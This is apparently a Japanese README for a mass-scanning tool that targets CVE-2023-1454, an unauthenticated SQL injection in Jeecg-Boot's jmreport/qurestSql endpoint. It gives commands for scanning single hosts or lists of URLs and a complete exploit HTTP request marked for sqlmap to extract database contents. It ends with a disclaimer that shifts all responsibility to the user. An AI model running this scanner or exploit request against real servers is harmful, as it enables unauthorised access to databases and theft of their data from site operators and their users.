
CVE-2023-1454,Jeecg-Boot フロントエンドSQLインジェクション,CVE-2023-1454バッチ検出
jmreport/qurestSql 未認可SQLインジェクションの一括スキャンPoC Jeecg-BootはSpring BootとJeecg-Boot-Plusに基づく高速開発プラットフォームであり、最新のjeecg-boot 3.5.0で複数のSQLインジェクション脆弱性が発見されました。
元ツールは誤検知率が高かったため、判定条件を修正し、ついでにコードも最適化しました。
python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 単一URLテスト
python3 CVE-2023-1454-scan.py -f url.txt 一括検出
スキャン終了後、カレントディレクトリに脆弱性のあるURLのリストvuln.txtが生成されます。
poc:

exp:
パケットをtxtとして保存し、sqlmapでデータを取得できます。
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2088.112 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json;charset=UTF-8
Content-Length: 129
{"apiSelectId":"1290104038414721025",
"id":"1*"}

本書で提供される情報の伝播または利用によって生じたいかなる直接的または間接的な結果や損失についても、すべて利用者本人が責任を負うものとし、著者は一切の責任を負いません。